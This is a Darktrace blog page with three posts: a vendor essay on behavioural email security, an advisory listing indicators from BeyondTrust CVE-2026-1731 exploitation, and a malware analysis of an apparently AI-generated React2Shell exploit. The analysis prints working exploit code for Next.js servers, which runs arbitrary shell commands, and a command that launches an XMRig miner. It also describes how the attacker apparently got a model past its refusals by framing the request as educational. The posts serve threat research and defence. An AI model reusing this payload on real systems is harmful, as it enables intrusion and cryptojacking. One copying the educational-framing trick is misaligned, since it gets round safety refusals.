Blog
/
Email
/
March 29, 2023

Email Security & Future Innovations: Educating Employees

As attackers shift toward more targeted and sophisticated campaigns, Darktrace stresses the importance of email security that understands normal user behavior rather than relying on historical attack data.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product

In an escalating threat landscape with email as the primary target, IT teams need to move far beyond traditional methods of email security that haven't evolved fast enough – they're trained on historical attack data, so only catch what they've seen before. By design, they are permanently playing catch up to continually innovating attackers, taking an average of 13 days to recognize new attacks[1].

Phishing attacks are getting more targeted and sophisticated as attackers innovate in two key areas: delivery tactics, and social engineering. On the malware delivery side, attackers are increasingly ‘piggybacking’ off the legitimate infrastructure and reputations of services like SharePoint and OneDrive, as well as legitimate email accounts, to evade security tools. 

To evade the human on the other end of the email, attackers are tapping into new social engineering tactics, exploiting fear, uncertainty, and doubt (FUD) and evoking a sense of urgency as ever, but now have tools at their disposal to enable tailored and personalized social engineering at scale. 

With the help of tools such as ChatGPT, threat actors can leverage AI technologies to impersonate trusted organizations and contacts – including damaging business email compromises, realistic spear phishing, spoofing, and social engineering. In fact, Darktrace found that the average linguistic complexity of phishing emails has jumped by 17% since the release of ChatGPT.  

This is just one example of accelerating attack sophistication – lowering the barrier to entry and improving outcomes for attackers. It forms part of a wider trend of the attack landscape moving from low-sophistication, low-impact, and generic phishing tactics - a 'spray and pray' approach - to more targeted, sophisticated, and higher impact attacks that fall outside of the typical detection remit for any tool relying on rules and signatures. Generative AI and other technologies in the attackers' toolkit will soon enable the launch of these attacks at scale, and only being able to catch known threats that have been seen before will no longer be enough.

Figure 1: The progression of attacks and relative coverage of email security tools

The vast majority of email security tools look to the past to try to predict the next attack – they are designed to catch today's attacks tomorrow.

Organizations are increasingly moving towards AI systems, but not all AI is the same, and the application of that AI is crucial. IT and security teams need to move towards email security that is context-aware and leverages AI for deep behavioral analysis – a proven approach that successfully catches attacks that slip by other tools across thousands of organizations. Email security today also needs to be about more than just protecting the inbox. It needs to address not just malicious emails, but the full 360-degree view of a user across their email messages and accounts, as well as extended coverage where email bleeds into collaboration tools and SaaS. For many organizations, the question is not if they should upgrade their email security, but when – how much longer can they risk relying on email security that's stuck looking to the past?

The Email Security Industry: Playing Catch-Up

Gateways and ICES (Integrated Cloud Email Security) providers have something in common: they look to past attacks in order to try to predict the future. They often rely on previous threat intelligence and on assembling ‘deny-lists’ of known bad elements of emails already identified as malicious – these tools fail to meet the reality of the contemporary threat landscape. Some of these tools attempt to use AI to improve this flawed approach, looking not only for direct matches, but using "data augmentation" to try and find similar-looking emails. But this approach is still inherently blind to novel threats. 
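To see why deny-list matching is inherently blind to novel threats, consider a toy sketch (purely illustrative – not any vendor's implementation; the domains and threshold are invented): even fuzzy "data augmentation" matching only fires when a new email resembles something already catalogued.

```python
from difflib import SequenceMatcher

# Toy deny-list of previously identified malicious sender domains (invented)
DENY_LIST = {"payr0ll-update.com", "invoice-secure.net"}

def deny_list_verdict(sender_domain, fuzz_threshold=0.85):
    """Return True if the domain matches a known-bad entry,
    exactly or approximately ("data augmentation" style)."""
    if sender_domain in DENY_LIST:
        return True
    return any(
        SequenceMatcher(None, sender_domain, bad).ratio() >= fuzz_threshold
        for bad in DENY_LIST
    )

# A near-duplicate of a known-bad domain is caught...
print(deny_list_verdict("payr0ll-updates.com"))   # True
# ...but a genuinely novel domain sails straight through.
print(deny_list_verdict("hr-benefits-portal.io"))  # False
```

The second lookup is the failure mode the article describes: a novel attack has no resemblance to anything on the list, so a backward-looking tool has nothing to match against.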

These tools tend to be resource-intensive, requiring constant policy maintenance combined with the hand-to-hand combat of releasing held-but-legitimate emails and holding back malicious phishing emails. This burden of manually releasing individual emails typically falls on security teams, teams that are frequently small with multiple areas of responsibility. The solution is to deploy technology that autonomously stops the bad while allowing the good through, and adapts to changes in the organization – technology that actually fits the definition of ‘set and forget’.  

Becoming behavioral and context-aware  

There is a seismic shift underway in the industry, from "secure" email gateways to intelligent AI-driven thinking. The right approach is to understand the behaviors of end users – how each person uses their inbox and what constitutes 'normal' for each user – in order to detect what's not normal. It makes use of context – how and when people communicate, and with whom – to spot the unusual and to flag to the user when something doesn't look quite right – and why. Basically, a system that understands you. Not past attacks.

Darktrace has developed a fundamentally different approach to AI, one that doesn’t learn what’s dangerous from historical data but from a deep continuous understanding of each organization and their users. Only a complex understanding of the normal day-to-day behavior of each employee can accurately determine whether or not an email actually belongs in that recipient’s inbox. 
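As a minimal sketch of this idea (illustrative only – not Darktrace's actual models, and the scoring is deliberately crude), a per-user baseline might record who each recipient normally hears from and score how surprising a new sender is:

```python
from collections import Counter

class InboxBaseline:
    """Toy per-user model: learns normal sender frequencies,
    then scores how surprising a new email is."""
    def __init__(self):
        self.sender_counts = Counter()
        self.total = 0

    def observe(self, sender):
        """Record one observed email from this sender."""
        self.sender_counts[sender] += 1
        self.total += 1

    def anomaly_score(self, sender):
        """0.0 = completely normal, 1.0 = never seen before."""
        if self.total == 0:
            return 1.0
        return round(1.0 - self.sender_counts[sender] / self.total, 4)

baseline = InboxBaseline()
for _ in range(99):
    baseline.observe("colleague@company.com")
baseline.observe("vendor@partner.com")

print(baseline.anomaly_score("colleague@company.com"))     # 0.01
print(baseline.anomaly_score("ceo@cornpany-payments.biz"))  # 1.0
```

Real behavioral AI considers far richer signals (timing, content, links, relationships across the organization), but the principle is the same: the verdict comes from the recipient's own history, not from a catalogue of past attacks.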

Whether it’s phishing, ransomware, invoice fraud, executive impersonation, or a novel technique, leveraging AI for behavioral analysis allows for faster decision-making – it doesn’t need to wait for a Patient Zero to contain a new attack because it can stop malicious threats on first encounter. This increased confidence in detection allows for a more precise response – targeted action to remove only the riskiest parts of an email, rather than taking a broad blanket response out of caution – in order to reduce risk with minimal disruption to the business.
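The graduated-response idea can be sketched the same way (again purely illustrative – the thresholds and action names below are invented, not the product's actual logic): the action taken scales with detection confidence, so a slightly unusual email might only have its links neutralized rather than being held outright.

```python
def targeted_action(anomaly_score):
    """Map detection confidence to the least disruptive
    response that still removes the risk (toy thresholds)."""
    if anomaly_score >= 0.9:
        return "hold_email"         # near-certain threat
    if anomaly_score >= 0.6:
        return "strip_attachments"  # remove risky payloads only
    if anomaly_score >= 0.3:
        return "rewrite_links"      # neutralize URLs, deliver body
    return "deliver"                # normal traffic flows freely

print(targeted_action(0.95))  # hold_email
print(targeted_action(0.4))   # rewrite_links
```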

Returning to our attack spectrum, as the attack landscape moves increasingly towards highly sophisticated attacks that use novel or seemingly legitimate infrastructure to deliver malware and lure victims, it has never been more important to detect and issue an appropriate response to these high-impact and targeted attacks.

Figure 2: How Darktrace combines with native email security to cover the full spectrum of attacks

Understanding you and a 360° view of the end user  

We know that modern email security isn’t limited to the inbox alone – it has to encompass a full understanding of a user’s normal behavior across email and beyond. Traditional email tools are focused solely on inbound email as the point of breach, which fails to protect against the potentially catastrophic damage caused by a successful email attack once an account has been compromised.    

Figure 3: A 360° understanding of a user reveals their digital touchpoints beyond Microsoft

In order to have complete context around what is normal for a user, it’s crucial to understand their activity within Microsoft 365, Google Workspace, Salesforce, Dropbox, and even their device on the network. Monitoring devices (as well as inboxes) for symptoms of infection is crucial to determining whether or not an email has been malicious, and whether similar emails need to be withheld in the future. Combining this with data from cloud apps enables a more holistic view of identity-based attacks.

Understanding a user in the context of the whole organization – which also means network, cloud, and endpoint data – brings additional context to light to improve decision making, and connecting email security with external data on the attack surface can help proactively find malicious domains, so that defenses can be hardened before an attack is even launched.

Educating and Engaging Your Employees

Ultimately, it’s employees who interact with any given email. If organizations can successfully empower this user base, they will end up with a smarter workforce, fewer successful attacks, and a security team with more time on their hands for better, strategic work. 

The tools that succeed best will be those that can leverage AI to help employees become more security-conscious. While some emails are evidently malicious and should never enter an employee’s inbox, there is a significant grey area of emails that have potentially risky elements. The majority of security tools will either withhold these emails completely – even though they might be business critical – or let them through scot-free. But what if these grey-area emails could in fact be used as training opportunities?    

As opposed to phishing simulation vendors, behavioral AI can improve security awareness holistically throughout organizations by training users with a light touch via their own inboxes – bringing the end user into the loop to harden defenses.  

The new frontier of email security fights AI with AI, and organizations that lag behind might end up learning the hard way. Read on for our blog series about how these technologies can transform the employee experience, dynamize deployment, augment security teams and form part of an integrated defensive loop.

[1] 13 days is the mean time phishing payloads remained active in the wild, comparing the response of Darktrace/Email against the earliest of 16 independent feeds submitted by other email security technologies.



February 13, 2026

CVE-2026-1731: How Darktrace Sees the BeyondTrust Exploitation Wave Unfolding


Note: Darktrace's Threat Research team is publishing now to help defenders. We will continue updating this blog as our investigations unfold.

Background

On February 6, 2026, the Identity and Access Management vendor BeyondTrust announced patches for a vulnerability, CVE-2026-1731, which enables unauthenticated remote code execution using specially crafted requests. This vulnerability affects BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) [1].

A Proof of Concept (PoC) exploit for this vulnerability was released publicly on February 10, and open-source intelligence (OSINT) reported exploitation attempts within 24 hours [2].

Previous intrusions against BeyondTrust technology have been cited as being affiliated with nation-state attacks, including a 2024 breach targeting the U.S. Treasury Department. That incident led to subsequent emergency directives from the Cybersecurity and Infrastructure Security Agency (CISA), and later investigation showed attackers had chained previously unknown vulnerabilities to achieve their goals [3].

Additionally, there appears to be infrastructure overlap with React2Shell mass exploitation previously observed by Darktrace, with the command-and-control (C2) domain avg.domaininfo[.]top seen in potential post-exploitation activity for BeyondTrust, as well as in a React2Shell exploitation case involving possible EtherRAT deployment.

Darktrace Detections

Darktrace’s Threat Research team has identified highly anomalous activity across several customers that may relate to exploitation of BeyondTrust since February 10, 2026. Observed activities include:

- Outbound connections and DNS requests for endpoints associated with Out-of-Band Application Security Testing; these services are commonly abused by threat actors for exploit validation. Associated Darktrace models include:
  - Compromise / Possible Tunnelling to Bin Services
- Suspicious executable file downloads. Associated Darktrace models include:
  - Anomalous File / EXE from Rare External Location
- Alerts for the following model:
  - Compromise / Rare Domain Pointing to Internal IP
- Outbound beaconing to rare domains. Associated Darktrace models include:
  - Compromise / Agent Beacon (Medium Period)
  - Compromise / Agent Beacon (Long Period)
  - Compromise / Sustained TCP Beaconing Activity To Rare Endpoint
  - Compromise / Beacon to Young Endpoint
  - Anomalous Server Activity / Rare External from Server
  - Compromise / SSL Beaconing to Rare Destination
- Unusual cryptocurrency mining activity. Associated Darktrace models include:
  - Compromise / Monero Mining
  - Compromise / High Priority Crypto Currency Mining
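Beaconing of the kind these models describe is visible on the wire as unusually regular outbound connection timing. A simplified sketch of one way to flag it (illustrative only – not Darktrace's implementation; the jitter threshold is an assumption):

```python
from statistics import mean, pstdev

def looks_like_beaconing(timestamps, max_jitter=0.1):
    """Flag connection timing whose inter-arrival intervals are
    suspiciously regular (coefficient of variation below max_jitter)."""
    intervals = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(intervals) < 3:
        return False  # too few samples to judge
    cv = pstdev(intervals) / mean(intervals)
    return cv < max_jitter

# C2 beacon: one call-out every ~60 s with tiny jitter
beacon = [0, 60.2, 119.9, 180.1, 240.0, 300.3]
# Human browsing: bursty, irregular gaps
browsing = [0, 2.1, 2.5, 45.0, 46.2, 300.0]

print(looks_like_beaconing(beacon))    # True
print(looks_like_beaconing(browsing))  # False
```

Production systems weigh much more than timing regularity (destination rarity, endpoint age, JA3/SSL characteristics), but interval consistency remains one of the classic beaconing signals.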

IT Defenders: As part of best practices, we highly recommend employing an automated containment solution in your environment. For Darktrace customers, please ensure that Autonomous Response is configured correctly. More guidance regarding this activity and suggested actions can be found in the Darktrace Customer Portal.  

Appendices

Potential indicators of post-exploitation behavior:

- 217.76.57[.]78 – IP address – Likely C2 server
- hXXp://217.76.57[.]78:8009/index.js – URL – Likely payload
- b6a15e1f2f3e1f651a5ad4a18ce39d411d385ac7 – SHA1 – Likely payload
- 195.154.119[.]194 – IP address – Likely C2 server
- hXXp://195.154.119[.]194/index.js – URL – Likely payload
- avg.domaininfo[.]top – Hostname – Likely C2 server
- 104.234.174[.]5 – IP address – Possible C2 server
- 35da45aeca4701764eb49185b11ef23432f7162a – SHA1 – Possible payload
- hXXp://134.122.13[.]34:8979/c – URL – Possible payload
- 134.122.13[.]34 – IP address – Possible C2 server
- 28df16894a6732919c650cc5a3de94e434a81d80 – SHA1 – Possible payload

References:

1. https://nvd.nist.gov/vuln/detail/CVE-2026-1731
2. https://www.securityweek.com/beyondtrust-vulnerability-targeted-by-hackers-within-24-hours-of-poc-release/
3. https://www.rapid7.com/blog/post/etr-cve-2026-1731-critical-unauthenticated-remote-code-execution-rce-beyondtrust-remote-support-rs-privileged-remote-access-pra/

About the author
Emma Foulger
Global Threat Research Operations Lead


February 10, 2026

AI/LLM-Generated Malware Used to Exploit React2Shell


Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.

A recently observed intrusion against Darktrace’s CloudyPots environment revealed a fully AI‑generated malware sample exploiting CVE-2025-55182, also known as React2Shell. As AI‑assisted software development (“vibecoding”) becomes more widespread, attackers are increasingly leveraging large language models to rapidly produce functional tooling. This incident illustrates a broader shift: AI is now enabling even low-skill operators to generate effective exploitation frameworks at speed. This blog examines the attack chain, analyzes the AI-generated payload, and outlines what this evolution means for defenders.

Initial access

The intrusion was observed against the Darktrace Docker honeypot, which intentionally exposes the Docker daemon to the internet with no authentication. This configuration allows any attacker to discover the daemon and create a container via the Docker API.
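Because the unencrypted Docker API conventionally listens on TCP 2375, defenders can self-audit for this exact misconfiguration with a trivial reachability check. A minimal sketch (illustrative only – a listening port is a strong hint, not proof, that the daemon is exposed without authentication):

```python
import socket

def docker_daemon_exposed(host, port=2375, timeout=2.0):
    """Return True if anything is listening on the conventional
    unencrypted Docker API port. A quick self-audit helper:
    a successful TCP connect here warrants immediate investigation."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

If this returns True for any internet-facing host you own, the daemon should be bound to a local socket or placed behind TLS client-certificate authentication before an attacker finds it the way this one found the honeypot.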

The attacker was observed spawning a container named “python-metrics-collector”, configured with a startup command that first installed prerequisite tools including curl, wget, and Python 3.

Figure 1: Container spawned with the name ‘python-metrics-collector’.

Subsequently, it downloads a list of required Python packages from:

  • hxxps://pastebin[.]com/raw/Cce6tjHM

Finally, it downloads and runs a Python script from:

  • hxxps://smplu[.]link/dockerzero

This link redirects to a GitHub Gist hosted by the user “hackedyoulol”, whose account had been banned from GitHub at the time of writing.

  • hxxps://gist.githubusercontent[.]com/hackedyoulol/141b28863cf639c0a0dd563344101f24/raw/07ddc6bb5edac4e9fe5be96e7ab60eda0f9376c3/gistfile1.txt

Notably, the script did not contain a Docker spreader – unusual for Docker-focused malware – indicating that propagation was likely handled separately by a centralized spreader server.

Deployed components and execution chain

The downloaded Python payload was the central execution component of the intrusion. Notably, the sample maintained a strict separation between the exploitation script and any spreading mechanism. Given that Docker malware samples typically include their own spreader logic, the omission suggests that the attacker maintained and executed a dedicated spreading tool remotely.

The script begins with a multi-line comment:
"""
   Network Scanner with Exploitation Framework
   Educational/Research Purpose Only
   Docker-compatible: No external dependencies except requests
"""

This is very telling, as the overwhelming majority of samples analysed do not feature this level of commentary, since malware is often designed to be intentionally difficult to understand in order to hinder analysis. Quick scripts written by human operators generally prioritize speed and functionality over clarity. LLMs, on the other hand, document code with comments very thoroughly by design, a pattern we see repeated throughout the sample. Further, mainstream AI models will typically refuse to generate malware as part of their safeguards.

The presence of the phrase “Educational/Research Purpose Only” additionally suggests that the attacker likely jailbroke an AI model by framing the malicious request as educational.

When portions of the script were tested in AI‑detection software, the output further indicated that the code was likely generated by a large language model.

Figure 2: GPTZero AI-detection results indicating that the script was likely generated using an AI model.
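As a crude illustration of why comment density is such a strong tell (this is a toy heuristic, not the GPTZero methodology, and the sample snippets below are invented), one can simply compare the fraction of commented lines against what hastily written operator scripts typically exhibit:

```python
def comment_density(source):
    """Fraction of non-blank lines that are comments."""
    lines = [ln.strip() for ln in source.splitlines() if ln.strip()]
    commented = [ln for ln in lines if ln.startswith("#")]
    return len(commented) / len(lines) if lines else 0.0

# Heavily annotated, LLM-style snippet (invented for illustration)
llm_style = '''
# Network Scanner with Exploitation Framework
# Educational/Research Purpose Only
# Iterate over candidate hosts
for host in hosts:
    # Probe the target before exploitation
    probe(host)
'''

# Terse, human-operator-style snippet (invented for illustration)
human_style = '''
for h in hosts:
    probe(h)
'''

print(comment_density(llm_style) > comment_density(human_style))  # True
```

Real AI-detection tooling uses far richer stylometric features, but even this one-liner metric separates the two styles the analysis describes.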

The script is a well-constructed React2Shell exploitation toolkit that aims to gain remote code execution and deploy an XMRig (Monero) crypto miner. It uses an IP‑generation loop to identify potential targets and executes a crafted exploitation request containing:

  • A deliberately structured Next.js server component payload
  • A chunk designed to force an exception and reveal command output
  • A child process invocation to run arbitrary shell commands

    def execute_rce_command(base_url, command, timeout=120):
        """ACTUAL EXPLOIT METHOD - Next.js React Server Component RCE
        DO NOT MODIFY THIS FUNCTION
        Returns: (success, output)
        """
        try:
            # Disable SSL warnings
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

            crafted_chunk = {
                "then": "$1:__proto__:then",
                "status": "resolved_model",
                "reason": -1,
                "value": '{"then": "$B0"}',
                "_response": {
                    "_prefix": f"var res = process.mainModule.require('child_process').execSync('{command}', {{encoding: 'utf8', maxBuffer: 50 * 1024 * 1024, stdio: ['pipe', 'pipe', 'pipe']}}).toString(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
                    "_formData": {
                        "get": "$1:constructor:constructor",
                    },
                },
            }

            files = {
                "0": (None, json.dumps(crafted_chunk)),
                "1": (None, '"$@0"'),
            }

            headers = {"Next-Action": "x"}

            res = requests.post(base_url, files=files, headers=headers, timeout=timeout, verify=False)

This function is initially invoked with ‘whoami’ to determine if the host is vulnerable, before using wget to download XMRig from its GitHub repository and invoking it with a configured mining pool and wallet address.


WALLET = "45FizYc8eAcMAQetBjVCyeAs8M2ausJpUMLRGCGgLPEuJohTKeamMk6jVFRpX4x2MXHrJxwFdm3iPDufdSRv2agC5XjykhA"
XMRIG_VERSION = "6.21.0"
POOL_PORT_443 = "pool.supportxmr.com:443"
...
print_colored(f"[EXPLOIT] Starting miner on {identifier} (port 443)...", 'cyan')  
miner_cmd = f"nohup xmrig-{XMRIG_VERSION}/xmrig -o {POOL_PORT_443} -u {WALLET} -p {worker_name} --tls -B >/dev/null 2>&1 &"

success, _ = execute_rce_command(base_url, miner_cmd, timeout=10)

Many attackers do not realise that while Monero uses an opaque blockchain (so transactions cannot be traced and wallet balances cannot be viewed), mining pools such as supportxmr will publish statistics for each wallet address that are publicly available. This makes it trivial to track the success of the campaign and the earnings of the attacker.

Figure 3: The supportxmr mining pool overview for the attacker's wallet address

Based on this information we can determine the attacker has made approximately 0.015 XMR in total since the beginning of this campaign, which as of writing is valued at £5. Per day, the attacker is generating 0.004 XMR, which is £1.33 as of writing. The worker count is 91, meaning that 91 hosts have been infected by this sample.
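The back-of-the-envelope arithmetic above can be reproduced directly from the pool figures (the XMR amounts are those quoted in the text; the GBP rate is implied from the quoted £5 total):

```python
# Figures taken from the pool dashboard at the time of writing
total_xmr = 0.015
daily_xmr = 0.004
gbp_per_xmr = 5 / 0.015   # implied rate from the quoted £5 total (~£333/XMR)

total_gbp = total_xmr * gbp_per_xmr
daily_gbp = daily_xmr * gbp_per_xmr

print(f"Total earnings: £{total_gbp:.2f}")   # £5.00
print(f"Daily earnings: £{daily_gbp:.2f}")   # £1.33
```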

Conclusion

While the amount of money generated by the attacker in this case is relatively low, and cryptomining is far from a new technique, this campaign is proof that LLM-based AI tools have made cybercrime more accessible than ever. A single prompting session with a model was sufficient for this attacker to generate a functioning exploit framework and compromise more than ninety hosts, demonstrating that the operational value of AI for adversaries should not be underestimated.

CISOs and SOC leaders should treat this event as a preview of the near future. Threat actors can now generate custom malware on demand, modify exploits instantly, and automate every stage of compromise. Defenders must prioritize rapid patching, continuous attack surface monitoring, and behavioral detection approaches. AI‑generated malware is no longer theoretical — it is operational, scalable, and accessible to anyone.

Analyst commentary

It is worth noting that the downloaded script does not appear to include a Docker spreader, meaning the malware will not replicate to other victims from an infected host. This is uncommon for Docker malware, based on other samples analyzed by Darktrace researchers. This indicates that there is a separate script responsible for spreading, likely deployed by the attacker from a central spreader server. This theory is supported by the fact that the IP that initiated the connection, 49[.]36.33.11, is registered to a residential ISP in India. While it is possible the attacker is using a residential proxy server to cover their tracks, it is also plausible that they are running the spreading script from their home computer. However, this should not be taken as confirmed attribution.

Credit to Nathaniel Bill (Malware Research Engineer) and Nathaniel Jones (VP Threat Research | Field CISO AI Security)

Edited by Ryan Traill (Analyst Content Lead)

Indicators of Compromise (IoCs)

Spreader IP - 49[.]36.33.11
Malware host domain - smplu[.]link
Hash - 594ba70692730a7086ca0ce21ef37ebfc0fd1b0920e72ae23eff00935c48f15b
Hash 2 - d57dda6d9f9ab459ef5cc5105551f5c2061979f082e0c662f68e8c4c343d667d

About the author
Nathaniel Bill
Malware Research Engineer